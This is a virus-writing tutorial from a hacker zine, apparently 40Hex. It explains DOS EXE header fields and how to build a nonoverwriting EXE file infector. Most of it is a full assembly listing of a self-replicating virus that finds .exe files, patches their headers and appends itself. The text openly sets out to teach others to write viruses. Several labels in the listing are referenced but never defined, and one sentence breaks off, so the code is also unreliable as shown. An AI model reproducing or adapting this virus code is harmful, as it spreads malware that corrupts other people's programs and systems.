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                    An Introduction to Nonoverwriting Virii
                            Part II: EXE Infectors
                                 By Dark Angel

       In the  last issue  of 40Hex,  I presented  theory and  code  for  the
  nonoverwriting  COM   infector,  the   simplest  of  all  parasitic  virii.
  Hopefully, having  learned COM  infections cold,  you are now ready for EXE
  infections.  There is a grey veil covering the technique of EXE infections,
  as the majority of virii are COM-only.

       EXE infections  are, in  some  respects,  simpler  than  COM  viruses.
  However, to  understand the infection, you must understand the structure of
  EXE files  (naturally).   EXE files  are structured into segments which are
  loaded consecutively  atop one  another.  Thus, all an EXE infector must do
  is create  its own  segment in  the EXE  file and  alter  the  entry  point
  appropriately.   Therefore, EXE  infections do  not require  restoration of
  bytes of  code, but  rather involve  the manipulation  of the  header which
  appears in  the beginning every EXE file and the appending of viral code to
  the infected file.  The format of the header follows:

   Offset Description
     00   ID word, either 'MZ' or 'ZM'
     02   Number of bytes in the last (512 byte) page in the image
     04   Total number of 512 byte pages in the file
     06   Number of entries in the segment table
     08   Size of the header in (16 byte) paragraphs
     0A   Minimum memory required in paragraphs
     0C   Maximum memory requested in paragraphs
     0E   Initial offset in paragraphs to stack segment from header
     10   Initial offset in bytes of stack pointer from stack segment
     12   Negative checksum (ignored)
     14   Initial offset in bytes of instruction pointer from code segment
     16   Initial offset in paragraphs of code segment from header
     18   Offset of relocation table from start of file
     1A   Overlay number (ignored)

  The ID  word is  generally 'ZM'  (in the  Intel little-endian format).  Few
  files start  with the  alternate form,  'MZ' (once  again in  Intel little-
  endian format).   To  save space, a check for the alternate form of the EXE
  ID in  the virus  may be omitted, although a few files may be corrupted due
  to this omission.

  The words  at offsets  2 and  4 are related.  The word at offset 4 contains
  the filesize  in pages.   A  page is  a 512 byte chunk of memory, just as a
  word is  a two  byte chunk of memory.  This number is rounded up, so a file
  of length  514 bytes  would contain a 2 at offset 4 in the EXE header.  The
  word at offset 2 is the image length modulo 512.  The image length does not
  include the  header length.   This  is one of the bizarre quirks of the EXE
  header.   Since the header length is usually a multiple of 512 anyway, this
  quirk usually  does not  matter.  If the word at offset 2 is equal to four,
  then it  is generally  ignored (heck,  it's never really used anyway) since
  pre-1.10 versions  of the  Microsoft linker had a bug which caused the word
  to always  be equal  to four.  If you are bold, the virus can set this word
  to 4.   However, keep in mind that this was a bug of the linker and not all
  command interpreters may recognise this quirk.

  The minimum memory required by the program (offset A) can be ignored by the
  virus, as  the maximum  memory is generally allocated to the program by the
  operating system.   However,  once again,  ignoring this area of the header
  MAY cause  an unsucessful  infection.   Simply adding  the  virus  size  in
  paragraphs to this value can nullify the problem.

  The words  representing the  initial stack segment and pointer are reversed
  (not in  little-endian format).   In  other words,  an LES to this location
  will yield  the stack  pointer in  ES and  the  stack  segment  in  another
  register.   The initial  SS:SP is  calculated  with  the  base  address  of
  0000:0000 being at the end of the header.

  Similarly, the  initial CS:IP  (in little-endian format) is calculated with
  the base  address of  0000:0000 at  the end of the header.  For example, if
  the program  entry point  appears directly after the header, then the CS:IP
  would be 0000:0000.  When the program is loaded, the PSP+10 is added to the
  segment value (the extra 10 accounts for the 100h bytes of the PSP).

  All the  relevant portions  of the  EXE header  have been covered.  So what
  should be  done to  write a  nonoverwriting EXE infector?  First, the virus
  must be appended to the end of the file.  Second, the initial CS:IP must be
  saved and  subsequently changed  in the  header.   Third, the initial SS:SP
  should also  be saved  and changed.   This  is to avoid any possible memory
  conflicts from  the stack  overwriting viral  code.   Fourth, the file size
  area of  the header should be modified to correctly reflect the new size of
  the file.   Fifth,  any additional  safety modifications such as increasing
  the minimum  memory allocation  should be made.  Last, the header should be
  written to the infected file.

  There are  several good areas for ID bytes in the EXE header.  The first is
  in the stack pointer field.  Since it should be changed anyway, changing it
  to a  predictable number  would add nothing to the code length.  Make sure,
  however, to  make the stack pointer high enough to prevent code overwrites.
  Another common  area for ID bytes is in the negative checksum field.  Since
  it is  an unused  field, altering  it won't  affect the  execution  of  any

  One further item should be mentioned before the code for the EXE infector.
  It is important to remember that EXE files are loaded differently than COM
  files.  Although a PSP is still built, the initial CS does NOT point to it.
  Instead, it points to wherever the entry point happens to be.  DS and ES
  point to the PSP, and therefore do NOT point to the entry point (your virus
  code).  It is important to restore DS and ES to their proper values before
  returning control to the EXE.

  ----cut here---------------------------------------------------------------

  .model tiny                             ; Handy TASM directive
  .code                                   ; Virus code segment
            org 100h                      ; COM file starting IP
  ; Cheesy EXE infector
  ; Written by Dark Angel of PHALCON/SKISM
  ; For 40Hex Number 8 Volume 2 Issue 4
  id = 'DA'                               ; ID word for EXE infections

  startvirus:                             ; virus code starts here
            call next                     ; calculate delta offset
  next:     pop  bp                       ; bp = IP next
            sub  bp,offset next           ; bp = delta offset

            push ds
            push es
            push cs                       ; DS = CS
            pop  ds
            push cs                       ; ES = CS
            pop  es
            lea  si,[bp+jmpsave2]
            lea  di,[bp+jmpsave]

            mov  ah,1Ah                   ; Set new DTA
            lea  dx,[bp+newDTA]           ; new DTA @ DS:DX
            int  21h

            lea  dx,[bp+exe_mask]
            mov  ah,4eh                   ; find first file
            mov  cx,7                     ; any attribute
            int  21h                      ; DS:DX points to mask
            jc   done_infections          ; No mo files found

            mov  al,0h                    ; Open read only
            call open

            mov  ah,3fh                   ; Read file to buffer
            lea  dx,[bp+buffer]           ; @ DS:DX
            mov  cx,1Ah                   ; 1Ah bytes
            int  21h

            mov  ah,3eh                   ; Close file
            int  21h

  checkEXE: cmp  word ptr [bp+buffer+10h],id ; is it already infected?
            jnz  infect_exe
            mov  ah,4fh                   ; find next file
            jmp  short findfirstnext
            mov  ah,1ah                   ; restore DTA to default
            mov  dx,80h                   ; DTA in PSP
            pop  es
            pop  ds                       ; DS->PSP
            int  21h
            mov  ax,es                    ; AX = PSP segment
            add  ax,10h                   ; Adjust for PSP
            add  word ptr cs:[si+jmpsave+2],ax
            add  ax,word ptr cs:[si+stacksave+2]
            cli                           ; Clear intrpts for stack manip.
            mov  sp,word ptr cs:[si+stacksave]
            mov  ss,ax
            db   0eah                     ; jmp ssss:oooo
  jmpsave             dd ?                ; Original CS:IP
  stacksave           dd ?                ; Original SS:SP
  jmpsave2            dd 0fff00000h       ; Needed for carrier file
  stacksave2          dd ?

  creator             db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
  virusname           db '[DemoEXE] for 40Hex',0

            les  ax, dword ptr [bp+buffer+14h] ; Save old entry point
            mov  word ptr [bp+jmpsave2], ax
            mov  word ptr [bp+jmpsave2+2], es

            les  ax, dword ptr [bp+buffer+0Eh] ; Save old stack
            mov  word ptr [bp+stacksave2], es
            mov  word ptr [bp+stacksave2+2], ax

            mov  ax, word ptr [bp+buffer + 8] ; Get header size
            mov  cl, 4                        ; convert to bytes
            shl  ax, cl
            xchg ax, bx

            les  ax, [bp+offset newDTA+26]; Get file size
            mov  dx, es                   ; to DX:AX
            push ax
            push dx

            sub  ax, bx                   ; Subtract header size from
            sbb  dx, 0                    ; file size

            mov  cx, 10h                  ; Convert to segment:offset
            div  cx                       ; form

            mov  word ptr [bp+buffer+14h], dx ; New entry point
            mov  word ptr [bp+buffer+16h], ax

            mov  word ptr [bp+buffer+0Eh], ax ; and stack
            mov  word ptr [bp+buffer+10h], id

            pop  dx                       ; get file length
            pop  ax

            add  ax, heap-startvirus      ; add virus size
            adc  dx, 0

            mov  cl, 9                    ; 2**9 = 512
            push ax
            shr  ax, cl
            ror  dx, cl
            adc  dx, ax                   ; filesize in pages
            pop  ax
            and  ah, 1                    ; mod 512

            mov  word ptr [bp+buffer+4], dx ; new file size
            mov  word ptr [bp+buffer+2], ax

            push cs                       ; restore ES
            pop  es

            mov  cx, 1ah
            push cx                       ; Save # bytes to write
            xor  cx,cx                    ; Clear attributes
            call attributes               ; Set file attributes

            mov  al,2
            call open

            mov  ah,40h                   ; Write to file
            lea  dx,[bp+buffer]           ; Write from buffer
            pop  cx                       ; cx bytes
            int  21h

            mov  ax,4202h                 ; Move file pointer
            xor  cx,cx                    ; to end of file
            cwd                           ; xor dx,dx
            int  21h

            mov  ah,40h                   ; Concatenate virus
            lea  dx,[bp+startvirus]
            mov  cx,heap-startvirus       ; # bytes to write
            int  21h

            mov  ax,5701h                 ; Restore creation date/time
            mov  cx,word ptr [bp+newDTA+16h] ; time
            mov  dx,word ptr [bp+newDTA+18h] ; date
            int  21h

            mov  ah,3eh                   ; Close file
            int  21h

            mov ch,0
            mov cl,byte ptr [bp+newDTA+15h] ; Restore original
            call attributes                 ; attributes

  mo_infections: jmp find_next

            mov  ah,3dh
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h
            xchg ax,bx

            mov  ax,4301h                 ; Set attributes to cx
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h

  exe_mask            db '*.exe',0
  heap:                                   ; Variables not in code
  newDTA              db 42 dup (?)       ; Temporary DTA
  buffer              db 1ah dup (?)      ; read buffer
  endheap:                                ; End of virus

  end       startvirus

  ----cut here---------------------------------------------------------------

  This is a simple EXE infector.  It has limitations; for example, it does
  not handle misnamed COM files.  This can be remedied by a simple check:

    cmp [bp+buffer],'ZM'
    jnz misnamed_COM

  Take special notice of the done_infections and infect_exe procedures.  They
  handle all  the relevant portions of the EXE infection.  The restoration of
  the EXE  file simply  consists of  resetting the stack and a far jmp to the
  original entry point.

  A final  note on  EXE infections: it is often helpful to "pad" EXE files to
  the nearest  segment.  This accomplishes two things.  First, the initial IP
  is  always  0,  a  fact  which  can  be  used  to  eliminate  delta  offset
  calculations.   Code space  can be  saved by  replacing all  those annoying
  relative memory  addressing statements  ([bp+offset blip])  statements with
  their absolute  counterparts (blip).   Second, recalculation of header info
  can be  handled in  paragraphs, simplifying  it tremendously.  The code for
  this is left as an exercise for the reader.

  This file is dedicated to the [XxXX] (Censored. -Ed.) programmers (who have
  yet to figure out how to  write EXE  infectors).  Hopefully, this  text can
  teach them (and everyone else) how to progress beyond simple COM and spawn-
  ing EXE infectors.   In the next issue of 40Hex,  I will present the theory
  and code for the next step of file infector - the coveted SYS file.